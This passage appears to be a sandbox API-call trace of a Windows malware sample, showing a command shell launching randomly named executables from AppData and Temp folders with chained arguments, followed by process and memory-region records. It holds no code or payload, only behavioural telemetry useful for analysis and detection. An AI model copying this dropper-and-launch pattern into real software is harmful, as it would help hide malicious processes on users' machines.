nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 
[0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.813] _close (_FileHandle=4) returned 0 [0098.813] FindNextFileW (in: hFindFile=0x4d20b8, lpFindFileData=0x30edd8 | out: lpFindFileData=0x30edd8) returned 0 [0098.814] GetLastError () returned 0x12 [0098.814] FindClose (in: hFindFile=0x4d20b8 | out: hFindFile=0x4d20b8) returned 1 [0098.814] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0098.816] _close (_FileHandle=3) returned 0 [0098.817] GetConsoleTitleW (in: lpConsoleTitle=0x30f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.817] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe\"")) returned 0xffffffff [0098.817] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0098.817] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0098.817] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0098.817] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0098.817] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0098.817] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0098.817] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0098.817] _wcsicmp (_String1="\"C", _String2="PROMPT") returned 
-78 [0098.817] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0098.817] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0098.817] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0098.817] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0098.817] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0098.817] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0098.817] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0098.817] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0098.817] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0098.817] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0098.817] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0098.818] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0098.818] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0098.818] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0098.818] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0098.818] _wcsicmp (_String1="\"C", 
_String2="DEL") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0098.818] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0098.818] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0098.818] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0098.818] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0098.818] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0098.818] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0098.818] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0098.818] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0098.818] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0098.818] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0098.818] 
_wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0098.818] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0098.819] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0098.819] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0098.819] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0098.819] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0098.819] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0098.819] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0098.819] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0098.819] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0098.819] SetErrorMode (uMode=0x0) returned 0x0 [0098.819] SetErrorMode (uMode=0x1) returned 0x0 [0098.819] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\.", nBufferLength=0x208, lpBuffer=0x4d0618, lpFilePart=0x30ed94 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1", lpFilePart=0x30ed94*="MICROS~1") returned 0x27 [0098.819] SetErrorMode (uMode=0x0) returned 0x1 [0098.819] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\.") returned 1 [0098.819] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.822] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.822] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", fInfoLevelId=0x1, lpFindFileData=0x30eb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb30) returned 0x4d20b8 [0098.822] FindClose (in: 
hFindFile=0x4d20b8 | out: hFindFile=0x4d20b8) returned 1 [0098.822] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0098.823] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0098.823] GetConsoleTitleW (in: lpConsoleTitle=0x30f008, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.823] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30ef58 | out: lpAttributeList=0x30ee90, lpSize=0x30ef58) returned 1 [0098.823] UpdateProcThreadAttribute (in: lpAttributeList=0x30ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x30ef50, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ee90, lpPreviousValue=0x0) returned 1 [0098.823] GetStartupInfoW (in: lpStartupInfo=0x30ee4c | out: lpStartupInfo=0x30ee4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0098.823] _wcsnicmp (_String1="COPYCMD", 
_String2="LOCALAP", _MaxCount=0x7) returned -9 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="windir=", 
_MaxCount=0x7) returned -20 [0098.824] lstrcmpW (lpString1="\\Sypykbck.exe", lpString2="\\XCOPY.EXE") returned -1 [0098.824] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30eeec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30ef38 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessInformation=0x30ef38*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc0c, dwThreadId=0xc10)) returned 1 [0099.089] CloseHandle (hObject=0x4c) returned 1 [0099.089] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.089] GetEnvironmentStringsW () returned 0x4d2d68* [0099.089] FreeEnvironmentStringsW (penv=0x4d2d68) returned 1 [0099.089] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0100.942] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30ee2c | out: lpExitCode=0x30ee2c*=0x0) returned 1 [0100.942] CloseHandle (hObject=0x50) returned 1 [0100.942] _vsnwprintf (in: 
_Buffer=0x30ef74, _BufferCount=0x13, _Format="%08X", _ArgList=0x30ee38 | out: _Buffer="00000000") returned 8 [0100.942] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.942] GetEnvironmentStringsW () returned 0x4d24f0* [0100.942] FreeEnvironmentStringsW (penv=0x4d24f0) returned 1 [0100.942] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.942] GetEnvironmentStringsW () returned 0x4d24f0* [0100.942] FreeEnvironmentStringsW (penv=0x4d24f0) returned 1 [0100.942] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ee90 | out: lpAttributeList=0x30ee90) [0100.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.942] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.943] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.943] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.943] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.943] SetConsoleInputExeNameW () returned 0x1 [0100.943] GetConsoleOutputCP () returned 0x1b5 [0100.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.943] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.943] exit (_Code=0) Process: id = "17" image_name = "nhsgkr2p.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe" page_root = "0x7ea16860" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xb4c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 
"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1092 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1093 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1094 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1095 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1096 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1097 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1098 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1099 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1100 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1150 start_va = 0x140000 end_va 
= 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1151 start_va = 0x240000 end_va = 0x2a6fff entry_point = 0x240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1152 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1153 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1154 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1155 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1156 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1157 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1158 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1159 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 
